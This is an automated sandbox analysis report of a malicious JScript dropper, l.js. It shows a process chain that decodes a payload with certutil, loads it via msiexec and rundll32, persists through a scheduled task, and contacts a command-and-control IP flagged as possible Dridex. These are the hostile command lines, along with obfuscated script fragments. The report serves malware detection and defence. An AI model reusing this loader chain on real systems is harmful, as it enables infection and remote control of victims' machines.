
Windows Analysis Report
l.js

Overview

General Information

Sample name: l.js
Analysis ID: 1596998
MD5: 97835729c58cae6501e9b3a3776e9906
SHA1: 63012f62e00a491b83adaba8804d890ac809490a
SHA256: a75cab3593ad35620817235a9bd7938c7adaa8b3ce12a2da20e3e145ac304346

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Found evasive API chain (may stop execution after checking mutex)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: WScript or CScript Dropper
Uses certutil -decode
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Msiexec Execute Arbitrary DLL
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 980 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • certutil.exe (PID: 4480 cmdline: C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp MD5: F17616EC0522FC5633151F7CAA278CAA)
    • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 5672 cmdline: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp MD5: E5DA170027542E25EDE42FC54C929077)
  • certutil.exe (PID: 5672 cmdline: C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp MD5: F17616EC0522FC5633151F7CAA278CAA)
    • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 3060 cmdline: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp MD5: E5DA170027542E25EDE42FC54C929077)
  • rundll32.exe (PID: 2596 cmdline: C:\Windows\system32\rundll32.exe "C:\ProgramData\Whitefusion\Updater.dll",Start /u MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", ProcessId: 980, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp, CommandLine: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\msiexec.exe, NewProcessName: C:\Windows\System32\msiexec.exe, OriginalFileName: C:\Windows\System32\msiexec.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp, ProcessId: 5672, ProcessName: msiexec.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", ProcessId: 980, ProcessName: wscript.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-22T20:37:06.102276+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 50003 | 149.248.58.85 | 443 | TCP

Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B8179E FindFirstFileW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FindNextFileW,wcscmp,FindClose

Software Vulnerabilities

Source: l.js | Argument value: ['"Y q(1w,2G,2I){a o="";a i=0;UA(i<2I-1w.Uz().Uy){o=o+2G;i++}o=o+1w;2F(o)}Y 1t(t){a d,1v;d=q(t.Ux(),"0', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']
Source: l.js | Argument value: ['"Y q(1w,2G,2I){a o="";a i=0;UA(i<2I-1w.Uz().Uy){o=o+2G;i++}o=o+1w;2F(o)}Y 1t(t){a d,1v;d=q(t.Ux(),"0', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']
Source: l.js | Argument value: ['"Y q(1w,2G,2I){a o="";a i=0;UA(i<2I-1w.Uz().Uy){o=o+2G;i++}o=o+1w;2F(o)}Y 1t(t){a d,1v;d=q(t.Ux(),"0', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']

Networking

Source: C:\Windows\System32\rundll32.exe | Network Connect: 149.248.58.85 443
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50003 -> 149.248.58.85:443
Source: unknown | TCP traffic detected without corresponding DNS query: 149.248.58.85
Source: unknown | TCP traffic detected without corresponding DNS query: 149.248.58.85
Source: unknown | TCP traffic detected without corresponding DNS query: 149.248.58.85
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B81DF0 InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,wcslen,wcslen,wcscpy,wcscat,SetLastError,HttpSendRequestW,InternetReadFile,LoadLibraryW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2988366410.000002A92B8CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://149.248.58.85/
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B8CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://149.248.58.85/Q
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://149.248.58.85/d
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown | Network traffic detected: HTTP traffic on port 50003 -> 443
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Tasks\Whitefusion.job
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B88300
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B81D40
Source: l.js | Initial sample: Strings found which are bigger than 50
Source: rad64802.tmp.4.dr | Static PE information: Number of sections : 11 > 10
Source: Updater.dll.10.dr | Static PE information: Number of sections : 11 > 10
Source: classification engine | Classification label: mal72.evad.winJS@8/4@0/1
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B87670 CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,SysAllocString,SysFreeString
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\3e4d7a5b-aa72-4d5f-8f8c-b292257af55c
Source: C:\Windows\System32\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\461592c6-32a2-4a5a-9542-783ba1348002
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\radEBB74.tmp
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Whitefusion\Updater.dll",Start /u
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js"
Source: unknown | Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
Source: C:\Windows\System32\certutil.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp
Source: unknown | Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Whitefusion\Updater.dll",Start /u
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: certca.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: certca.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\certutil.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mstask.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: CreateTextFile(encoded_name); var t0=''; followed by a long run of t0=t0.concat('...') calls that assemble a base64-encoded PE (MZ) payload (blob omitted)
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B85810 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetSystemInfo,GetSystemMetrics
Source: l.js | Array: entropy: 5.25, length: 8008, content: 'eEJIQC|JEo''SlQAAkJD|J''f8VIOgAAE|''BIifHo|I1A''.5(\x27T5\x27);t''LDzAAAeZwA''match''AAAAAOiLCw''7A
Source: rad64802.tmp.4.dr | Static PE information: real checksum: 0xed95 should be: 0x14d84
Source: Updater.dll.10.dr | Static PE information: real checksum: 0xed95 should be: 0x14d84
Source: rad64802.tmp.4.dr | Static PE information: section name: .xdata
Source: Updater.dll.10.dr | Static PE information: section name: .xdata
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B8B4BF push rbp; retf 11_2_68B8B4C0
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B8B885 push rax; retf 11_2_68B8B886
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B8B0C5 push rax; retf 11_2_68B8B0C6
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B8C7D9 pushfq ; retf 11_2_68B8C7DB
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B8BD02 push rsi; iretd 11_2_68B8BD03
Source: C:\Windows\System32\msiexec.exe | File created: C:\ProgramData\Whitefusion\Updater.dll
Source: C:\Windows\System32\certutil.exe | File created: C:\Users\user\AppData\Local\Temp\rad64802.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\ProgramData\Whitefusion\Updater.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Tasks\Whitefusion.job

Hooking and other Techniques for Hiding and Protection

Source: unknown | Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
Source: unknown | Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B85C50 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,wcscmp,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe | Evasive API call chain: CreateMutex, DecisionNodes, Sleep (graph_11-3340)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\ProgramData\Whitefusion\Updater.dll
Source: C:\Windows\System32\certutil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rad64802.tmp
Source: C:\Windows\System32\rundll32.exe | Evasive API call chain: GetModuleFileName, DecisionNodes, Sleep (graph_11-4206)
Source: C:\Windows\System32\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B8179E FindFirstFileW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FindNextFileW,wcscmp,FindClose
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B85810 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetSystemInfo,GetSystemMetrics
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B8D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B8D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWK
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW h
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B85810 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetSystemInfo,GetSystemMetrics
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B857B5 GetProcessHeap,HeapReAlloc
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B87EB0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exe | Network Connect: 149.248.58.85 443
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B87DD0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,11_2_68B87DD0
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B847CE GetVolumeInformationW,GetModuleHandleW,GetModuleHandleW,GetComputerNameW,GetModuleHandleW,GetComputerNameExW,GetModuleHandleW,GetUserNameW,GetModuleHandleW,wcslen,OpenMutexW,GetModuleHandleW,GetTickCount,Sleep,OpenMutexW,CloseHandle,11_2_68B847CE
Source: C:\Windows\System32\rundll32.exe | Code function: 11_2_68B85810 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetSystemInfo,GetSystemMetrics,11_2_68B85810
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 23 Scripting | Valid Accounts | 2 Scheduled Task/Job | 23 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
